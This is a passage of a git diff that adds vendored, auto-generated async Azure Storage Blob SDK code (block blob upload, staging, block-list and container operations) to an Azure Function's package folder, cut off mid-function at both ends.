None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + + request = build_put_blob_from_url_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + copy_source=copy_source, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + copy_source_blob_properties=copy_source_blob_properties, + copy_source_authorization=copy_source_authorization, + copy_source_tags=copy_source_tags, + template_url=self.put_blob_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + put_blob_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def stage_block( # pylint: disable=inconsistent-return-statements + self, + block_id: str, + content_length: int, + body: IO, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """The Stage Block operation creates a new block to be committed as part of a blob. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + _content = body + + request = build_stage_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + block_id=block_id, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + request_id_parameter=request_id_parameter, + template_url=self.stage_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def stage_block_from_url( # pylint: disable=inconsistent-return-statements + self, + block_id: str, + content_length: int, + source_url: str, + source_range: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Stage Block operation creates a new block to be committed as part of a blob where the + contents are read from a URL. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_stage_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + block_id=block_id, + content_length=content_length, + source_url=source_url, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.stage_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def commit_block_list( # pylint: disable=inconsistent-return-statements + self, + blocks: "_models.BlockLookupList", + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Commit Block List operation writes a blob by specifying the list of block IDs that make up + the blob. In order to be written as part of a blob, a block must have been successfully written + to the server in a prior Put Block operation. You can call Put Block List to update a blob by + uploading only those blocks that have changed, then committing the new and existing blocks + together. You can do this by specifying whether to commit a block from the committed block list + or from the uncommitted block list, or to commit the most recently uploaded version of the + block, whichever list it may belong to. + + :param blocks: Blob Blocks. + :type blocks: ~azure.storage.blob.models.BlockLookupList + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _blob_cache_control = None + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = self._serialize.body(blocks, 'BlockLookupList', is_xml=True) + + request = build_commit_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.commit_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + commit_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_block_list( + self, + snapshot: Optional[str] = None, + list_type: Union[str, "_models.BlockListType"] = "committed", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.BlockList": + """The Get Block List operation retrieves the list of blocks that have been uploaded as part of a + block blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param list_type: Specifies whether to return the list of committed blocks, the list of + uncommitted blocks, or both lists together. Default value is "committed". + :type list_type: str or ~azure.storage.blob.models.BlockListType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlockList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlockList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlockList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_get_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + list_type=list_type, + timeout=timeout, + lease_id=_lease_id, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlockList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_container_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_container_operations.py new file mode 100644 index 0000000..a0101c4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_container_operations.py @@ -0,0 +1,1792 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._container_operations import build_acquire_lease_request, build_break_lease_request, build_change_lease_request, build_create_request, build_delete_request, build_filter_blobs_request, build_get_access_policy_request, build_get_account_info_request, build_get_properties_request, build_list_blob_flat_segment_request, build_list_blob_hierarchy_segment_request, build_release_lease_request, build_rename_request, build_renew_lease_request, build_restore_request, build_set_access_policy_request, build_set_metadata_request, build_submit_batch_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class ContainerOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`container` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + access: Optional[Union[str, "_models.PublicAccessType"]] = None, + request_id_parameter: Optional[str] = None, + container_cpk_scope_info: Optional["_models.ContainerCpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """creates a new container under the specified account. If the container with the same name + already exists, the operation fails. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_cpk_scope_info: Parameter group. Default value is None. + :type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _default_encryption_scope = None + _prevent_encryption_scope_override = None + if container_cpk_scope_info is not None: + _default_encryption_scope = container_cpk_scope_info.default_encryption_scope + _prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override + + request = build_create_request( + 